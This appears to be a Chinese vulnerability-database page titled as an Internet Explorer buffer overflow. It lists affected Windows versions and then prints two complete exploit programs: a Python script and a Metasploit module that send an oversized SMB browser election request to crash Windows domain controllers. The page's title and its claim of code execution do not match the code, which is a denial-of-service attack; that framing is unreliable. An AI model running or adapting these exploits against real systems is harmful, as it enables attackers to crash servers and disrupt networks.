Microsoft Windows IE 缓冲区溢出漏洞

影响版本:

Microsoft Windows XP Tablet PC Edition SP3
Microsoft Windows XP Service Pack 3 0
Microsoft Windows XP Professional x64 Edition SP3
Microsoft Windows XP Professional SP3
Microsoft Windows XP Media Center Edition SP3
Microsoft Windows XP Home SP3
Microsoft Windows XP Embedded SP3
Microsoft Windows Vista x64 Edition SP2
Microsoft Windows Vista x64 Edition SP1
Microsoft Windows Vista x64 Edition 0
Microsoft Windows Vista Ultimate 64-bit edition SP2
Microsoft Windows Vista Ultimate 64-bit edition SP1
Microsoft Windows Vista Ultimate 64-bit edition 0
Microsoft Windows Vista Home Premium 64-bit edition SP2
Microsoft Windows Vista Home Premium 64-bit edition SP1
Microsoft Windows Vista Home Premium 64-bit edition 0
Microsoft Windows Vista Home Basic 64-bit edition Sp2 X64
Microsoft Windows Vista Home Basic 64-bit edition SP2
Microsoft Windows Vista Home Basic 64-bit edition Sp1 X64
Microsoft Windows Vista Home Basic 64-bit edition SP1
Microsoft Windows Vista Home Basic 64-bit edition 0
Microsoft Windows Vista Enterprise 64-bit edition SP2
Microsoft Windows Vista Enterprise 64-bit edition SP1
Microsoft Windows Vista Enterprise 64-bit edition 0
Microsoft Windows Vista December CTP X64
Microsoft Windows Vista December CTP SP2
Microsoft Windows Vista December CTP SP1
Microsoft Windows Vista December CTP Gold
Microsoft Windows Vista December CTP
Microsoft Windows Vista Business 64-bit edition SP2
Microsoft Windows Vista Business 64-bit edition SP1
Microsoft Windows Vista Business 64-bit edition 0
Microsoft Windows Vista Ultimate SP2
Microsoft Windows Vista Ultimate SP1
Microsoft Windows Vista Ultimate
Microsoft Windows Vista SP2 Beta
Microsoft Windows Vista SP2
Microsoft Windows Vista SP1
Microsoft Windows Vista Home Premium SP2
Microsoft Windows Vista Home Premium SP1
Microsoft Windows Vista Home Premium
Microsoft Windows Vista Home Basic SP2
Microsoft Windows Vista Home Basic SP1
Microsoft Windows Vista Home Basic
Microsoft Windows Vista Enterprise SP2
Microsoft Windows Vista Enterprise SP1
Microsoft Windows Vista Enterprise
Microsoft Windows Vista Business SP2
Microsoft Windows Vista Business SP1
Microsoft Windows Vista Business
Microsoft Windows Vista beta 2
Microsoft Windows Vista Beta 1
Microsoft Windows Vista Beta
Microsoft Windows Vista 3.0
Microsoft Windows Vista 2.0
Microsoft Windows Vista 1.0
Microsoft Windows Vista 0
Microsoft Windows Server 2008 Standard Edition X64
Microsoft Windows Server 2008 Standard Edition SP2
Microsoft Windows Server 2008 Standard Edition Release Candidate
Microsoft Windows Server 2008 Standard Edition Itanium
Microsoft Windows Server 2008 Standard Edition 0
Microsoft Windows Server 2008 R2 x64 0
Microsoft Windows Server 2008 R2 Itanium 0
Microsoft Windows Server 2008 R2 Datacenter 0
Microsoft Windows Server 2008 for x64-based Systems SP2
Microsoft Windows Server 2008 for x64-based Systems R2
Microsoft Windows Server 2008 for x64-based Systems 0
Microsoft Windows Server 2008 for Itanium-based Systems SP2
Microsoft Windows Server 2008 for Itanium-based Systems R2
Microsoft Windows Server 2008 for Itanium-based Systems 0
Microsoft Windows Server 2008 for 32-bit Systems SP2
Microsoft Windows Server 2008 for 32-bit Systems 0
Microsoft Windows Server 2008 Enterprise Edition SP2
Microsoft Windows Server 2008 Enterprise Edition Release Candidate
Microsoft Windows Server 2008 Enterprise Edition 0
Microsoft Windows Server 2008 Datacenter Edition SP2
Microsoft Windows Server 2008 Datacenter Edition Release Candidate
Microsoft Windows Server 2008 Datacenter Edition 0
Microsoft Windows Server 2008 SP2 Beta
Microsoft Windows Server 2008 - Sp2 Enterprise X64
Microsoft Windows Server 2003 x64 SP2
Microsoft Windows Server 2003 x64 SP1
Microsoft Windows Server 2003 Web Edition SP2
Microsoft Windows Server 2003 Web Edition SP1 Beta 1
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Terminal Services 0
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows Server 2003 Standard Edition SP2
Microsoft Windows Server 2003 Standard Edition SP1 Beta 1
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 R2 web Edition 0
Microsoft Windows Server 2003 R2 Standard Edition 0
Microsoft Windows Server 2003 R2 Enterprise Edition SP2 0
Microsoft Windows Server 2003 R2 Enterprise Edition SP1 0
Microsoft Windows Server 2003 R2 Enterprise Edition 0
Microsoft Windows Server 2003 R2 Datacenter Edition SP2 0
Microsoft Windows Server 2003 R2 Datacenter Edition SP1 0
Microsoft Windows Server 2003 R2 Datacenter Edition 0
Microsoft Windows Server 2003 Itanium SP2
Microsoft Windows Server 2003 Itanium SP1
Microsoft Windows Server 2003 Itanium 0
Microsoft Windows Server 2003 Enterprise x64 Edition SP2
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium Sp2 Itanium
Microsoft Windows Server 2003 Enterprise Edition Itanium SP2
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1 Beta 1
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition SP1 Beta 1
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter x64 Edition SP2
Microsoft Windows Server 2003 Datacenter x64 Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1 Beta 1
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition SP1 Beta 1
Microsoft Windows Server 2003 Datacenter Edition SP1
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows Server 2008 R2
Microsoft Windows 7 XP Mode 0
Microsoft Windows 7 Ultimate 0
Microsoft Windows 7 Starter 0
Microsoft Windows 7 Professional 0
Microsoft Windows 7 Home Premium 0
Microsoft Windows 7 for x64-based Systems 0
Microsoft Windows 7 for Itanium-based Systems 0
Microsoft Windows 7 for 32-bit Systems 0
Microsoft Windows 7 RC
Microsoft Windows 7 beta
Microsoft Windows 7

漏洞描述:

攻击可以让攻击者执行系统级权限执行任意代码

<*参考

测试方法:

import socket,sys,struct
from socket import *

if len(sys.argv)<=4:
 sys.exit("""usage: python sploit.py UR-IP BCAST-IP NBT-NAME AD-NAME
 example: python sploit.py 192.168.1.10 192.168.1.255 OhYeah
AD-NETBIOS-NAME""")

ourip = sys.argv[1]
host = sys.argv[2]
srcname = sys.argv[3].upper()
dstname = sys.argv[4].upper()


ELEC&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; = "\x42\x4f\x00"
WREDIR&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; = "\x41\x41\x00"

def encodename(nbt,service):
&nbsp; &nbsp; final = '\x20'+''.join([chr((ord(i)>>4) + ord('A'))+chr((ord(i)&0xF) +
ord('A')) for i in nbt])+((15 - len(nbt)) * str('\x43\x41'))+service
&nbsp; &nbsp; return final

def lengthlittle(packet,addnum):
&nbsp; &nbsp; length = struct.pack("<i", len(packet)+addnum)[0:2]
&nbsp; &nbsp; return length

def lengthbig(packet,addnum):
&nbsp; &nbsp; length = struct.pack(">i", len(packet)+addnum)[2:4]
&nbsp; &nbsp; return length

def election(srcname):
&nbsp; &nbsp; elec = "\x08"
&nbsp; &nbsp; elec+= "\x09" #Be the boss or die
&nbsp; &nbsp; elec+= "\xa8\x0f\x01\x20" #Be the boss or die
&nbsp; &nbsp; elec+= "\x1b\xe9\xa5\x00" #Up time
&nbsp; &nbsp; elec+= "\x00\x00\x00\x00" #Null, like SDLC
&nbsp; &nbsp; elec+= srcname+"\x00"
&nbsp; &nbsp; return elec

def smbheaderudp(op="\x25"):
&nbsp; &nbsp; smbheader= "\xff\x53\x4d\x42"
&nbsp; &nbsp; smbheader+= op
&nbsp; &nbsp; smbheader+= "\x00"
&nbsp; &nbsp; smbheader+= "\x00"
&nbsp; &nbsp; smbheader+= "\x00\x00"
&nbsp; &nbsp; smbheader+= "\x00"
&nbsp; &nbsp; smbheader+= "\x00\x00"
&nbsp; &nbsp; smbheader+= "\x00\x00"
&nbsp; &nbsp; smbheader+= "\x00\x00\x00\x00\x00\x00\x00\x00"
&nbsp; &nbsp; smbheader+=&nbsp; "\x00\x00"
&nbsp; &nbsp; smbheader+= "\x00\x00"
&nbsp; &nbsp; smbheader+= "\x00\x00"
&nbsp; &nbsp; smbheader+= "\x00\x00"
&nbsp; &nbsp; smbheader+= "\x00\x00"
&nbsp; &nbsp; return smbheader


def
trans2mailslot(tid="\x80\x0b",ip=ourip,sname="LOVE-SDL",dname="SRD-LOVE",namepipe="\MAILSLOT\BROWSE",srcservice="\x41\x41\x00",dstservice="\x41\x41\x00",pbrowser=""):
&nbsp; &nbsp; packetbrowser&nbsp; =&nbsp; pbrowser
&nbsp; &nbsp; packetmailslot = "\x01\x00"
&nbsp; &nbsp; packetmailslot+= "\x00\x00"
&nbsp; &nbsp; packetmailslot+= "\x02\x00"
&nbsp; &nbsp; packetmailslot+= lengthlittle(packetbrowser+namepipe,4)
&nbsp; &nbsp; packetmailslot+= namepipe +"\x00"
&nbsp; &nbsp; packetdatagram = "\x11"
&nbsp; &nbsp; packetdatagram+= "\x02"
&nbsp; &nbsp; packetdatagram+= tid
&nbsp; &nbsp; packetdatagram+= inet_aton(ip)
&nbsp; &nbsp; packetdatagram+= "\x00\x8a"
&nbsp; &nbsp; packetdatagram+= "\x00\xa7"
&nbsp; &nbsp; packetdatagram+= "\x00\x00"
&nbsp; &nbsp; packetdatagramname = encodename(sname,srcservice)
&nbsp; &nbsp; packetdatagramname+= encodename(dname,dstservice)
&nbsp; &nbsp; smbheader= smbheaderudp("\x25")
&nbsp; &nbsp; packetrans2 = "\x11"
&nbsp; &nbsp; packetrans2+= "\x00\x00"
&nbsp; &nbsp; packetrans2+= lengthlittle(packetbrowser,0)
&nbsp; &nbsp; packetrans2+= "\x00\x00"
&nbsp; &nbsp; packetrans2+= "\x00\x00"
&nbsp; &nbsp; packetrans2+= "\x00"
&nbsp; &nbsp; packetrans2+= "\x00"
&nbsp; &nbsp; packetrans2+= "\x00\x00"
&nbsp; &nbsp; packetrans2+= "\xe8\x03\x00\x00"
&nbsp; &nbsp; packetrans2+= "\x00\x00"
&nbsp; &nbsp; packetrans2+= "\x00\x00"
&nbsp; &nbsp; packetrans2+= "\x00\x00"
&nbsp; &nbsp; packetrans2+= lengthlittle(packetbrowser,0)
&nbsp; &nbsp; packetrans2+= lengthlittle(smbheader+packetrans2+packetmailslot,4)
&nbsp; &nbsp; packetrans2+= "\x03"
&nbsp; &nbsp; packetrans2+= "\x00"
&nbsp; &nbsp; andoffset = lengthlittle(smbheader+packetrans2+packetmailslot,2)
&nbsp; &nbsp; lengthcalc =
packetdatagramname+smbheader+packetrans2+packetmailslot+packetbrowser
&nbsp; &nbsp; packetfinal =
packetdatagram+packetdatagramname+smbheader+packetrans2+packetmailslot+packetbrowser
&nbsp; &nbsp; packetotalength = list(packetfinal)
&nbsp; &nbsp; packetotalength[10:12] = lengthbig(lengthcalc,0)
&nbsp; &nbsp; packetrans2final = ''.join(packetotalength)
&nbsp; &nbsp; return packetrans2final

def sockbroad(host,sourceservice,destservice,packet):
&nbsp; &nbsp;s = socket(AF_INET,SOCK_DGRAM)
&nbsp; &nbsp;s.setsockopt(SOL_SOCKET, SO_BROADCAST,1)
&nbsp; &nbsp;s.bind(('0.0.0.0', 138))
&nbsp; &nbsp;try:
&nbsp; &nbsp; &nbsp; packsmbheader = smbheaderudp("\x25")
&nbsp; &nbsp; &nbsp; buffer0 =
trans2mailslot(tid="\x80\x22",ip=ourip,sname=srcname,dname=dstname,namepipe="\MAILSLOT\BROWSER",srcservice=sourceservice,
dstservice=destservice, pbrowser=packet)
&nbsp; &nbsp; &nbsp; s.sendto(buffer0,(host,138))
&nbsp; &nbsp;except:
&nbsp; &nbsp; &nbsp; print "expected SDL error:", sys.exc_info()[0]
&nbsp; &nbsp; &nbsp; raise

sockbroad(host,WREDIR,ELEC,election("A" * 410)) # -> Zing it! (between
~60->410)
print "Happy St-Valentine Bitches\nMSFT found that one loooooooong time
ago...."
=====================================================================
class Metasploit3 < Msf::Auxiliary

&nbsp; &nbsp;include Msf::Exploit::Remote::Udp
   #include Msf::Exploit::Remote::SMB
   include Auxiliary::Dos

   def initialize(info = {})
      super(update_info(info,
         'Name'&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;=> 'Microsoft Windows MRXSMB.SYS _BowserWriteErrorLogEntry Pool Overflow DoS',
         'Description'&nbsp; &nbsp; => %q{
               This module exploits a denial of service flaw in the Microsoft
            Windows SMB service on versions of Windows Server 2003 that have been
            configured as a domain controller. By sending a specially crafted election
            request, an attacker can cause a pool overflow.

            The vulnerability appears to be due to an error handling a length value
            while calculating the amount of memory to copy to a buffer. When there are
            zero bytes left in the buffer, the length value is improperly decremented
            and an integer underflow occurs. The resulting value is used in several
            calculations and is then passed as the length value to an inline memcpy
            operation.

            Unfortunately, the length value appears to be fixed at -2 (0xfffffffe) and
            causes considerable damage to kernel heap memory. While theoretically possible,
            it does not appear to be trivial to turn this vulnerability into remote (or
            even local) code execution.
         },
         'References'&nbsp; &nbsp; &nbsp;=>
            [
               #[ 'CVE', '2011-XXXX' ],
               #[ 'OSVDB', 'XXXX' ],
               #[ 'MSB', 'MS11-XXX' ],
               [ 'URL', 'http://www.leehoosoftware.org' ' ],
               [ 'URL', 'http://www.leehoosoftware.org' ]
            ],
         'Author'&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;=> [ 'Cupidon-3005', 'jduck' ],
         'License'&nbsp; &nbsp; &nbsp; &nbsp; => MSF_LICENSE,
         'Version'&nbsp; &nbsp; &nbsp; &nbsp; => '$Revision: 11756 $'
      ))

      register_options(
         [
            Opt::RPORT(138),
            OptString.new('DOMAIN', [ true, "The name of the domain that the target controls" ])
         ], self.class)
   end


   def run

      connect_udp
      @client = Rex::Proto::SMB::Client.new(udp_sock)

      ip = Rex::Socket.source_address(datastore['RHOST'])
      ip_src = Rex::Socket.gethostbyname(ip)[3]

      svc_src = "\x41\x41\x00"&nbsp; &nbsp;# pre-encoded?
      name_src = Rex::Text.rand_text_alphanumeric(4+rand(10))

      svc_dst = "\x42\x4f\x00"&nbsp; &nbsp;# pre-encoded?
      name_dst = datastore['DOMAIN']

      pipe = "\\MAILSLOT\\BROWSER"

      election =
         "\x08" +&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # Election Request
         "\x09" +&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # Election Version
         "\xa8" +&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # election desire - Domain Master & WINS & NT
         "\x0f" +&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # Browser Protocol Major Version
         "\x01" +&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # Browser Protocol Minor Version
         "\x20" +&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # Election OS (NT Server)
         "\x1b\xe9\xa5\x00" +&nbsp; # Uptime
         "\x00\x00\x00\x00" +&nbsp; # NULL... Padding?
         ("A" * 410) + "\x00"&nbsp; # name

      nbdghdr =
         "\x11" +&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # DIRECT_GROUP datagram
         "\x02" +&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # first and only fragment
         [rand(0xffff)].pack('n') +&nbsp; # Transation Id (DGM_ID)
         ip_src +
         "\x00\x8a" +&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # Source Port (138)
         "\x00\xa7" +&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # DGM_LENGTH, patched in after
         "\x00\x00"&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # PACKET_OFFSET

      nbdgs = nbdghdr +
         half_ascii(name_src, svc_src) +
         half_ascii(name_dst, svc_dst)

      # A Trans request for the mailslot
      nbdgs << trans_mailslot(pipe, '', election)

      # Patch up the length (less the nb header)
      nbdgs[0x0a, 2] = [nbdgs.length - nbdghdr.length].pack('n')

      print_status("Sending specially crafted browser election request..")
      #print_status("\n" + Rex::Text.to_hex_dump(nbdgs))
      udp_sock.put(nbdgs)

      print_status("The target should encounter a blue screen error now.")

      disconnect_udp

   end


   # Perform a browser election request using the specified subcommand, parameters, and data
   def trans_mailslot(pipe, param = '', body = '')

      # Null-terminate the pipe parameter if needed
      if (pipe[-1,1] != "\x00")
         pipe << "\x00"
      end

      pkt = Rex::Proto::SMB::Constants::SMB_TRANS_PKT.make_struct
      @client.smb_defaults(pkt['Payload']['SMB'])

      setup_count = 3
      setup_data = [1, 0, 2].pack('v*')

      data = pipe + param + body

      base_offset = pkt.to_s.length + (setup_count * 2) - 4
      param_offset = base_offset + pipe.length
      data_offset = param_offset + param.length

      pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_TRANSACTION
      pkt['Payload']['SMB'].v['Flags1'] = 0x0
      pkt['Payload']['SMB'].v['Flags2'] = 0x0
      pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count

      pkt['Payload'].v['ParamCountTotal'] = param.length
      pkt['Payload'].v['DataCountTotal'] = data.length
      pkt['Payload'].v['ParamCountMax'] = 0
      pkt['Payload'].v['DataCountMax'] = 0

      pkt['Payload'].v['ParamCount'] = param.length
      pkt['Payload'].v['ParamOffset'] = param_offset if param.length > 0
      pkt['Payload'].v['DataCount'] = body.length
      pkt['Payload'].v['DataOffset'] = data_offset
      pkt['Payload'].v['SetupCount'] = setup_count
      pkt['Payload'].v['SetupData'] = setup_data

      pkt['Payload'].v['Payload'] = data

      exploit = pkt.to_s

      # Strip off the netbios header (thx, but no thx!)
      exploit[4, exploit.length - 4]
   end


   def half_ascii(name, svc)
      ret = " "
      name.unpack('C*').each { |byte|
         ret << [0x41 + (byte >> 4)].pack('C')
         ret << [0x41 + (byte & 0xf)].pack('C')
      }
      left = 15 - name.length
      if left > 0
         ret << "\x43\x41" * left
      end

      # In our case, svc is already encoded..
      ret << svc
      ret
   end

end

ZeroBox Vulnerability Database

坚持！我们将做的更好！

Microsoft Windows IE 缓冲区溢出漏洞

0 条评论。

发表评论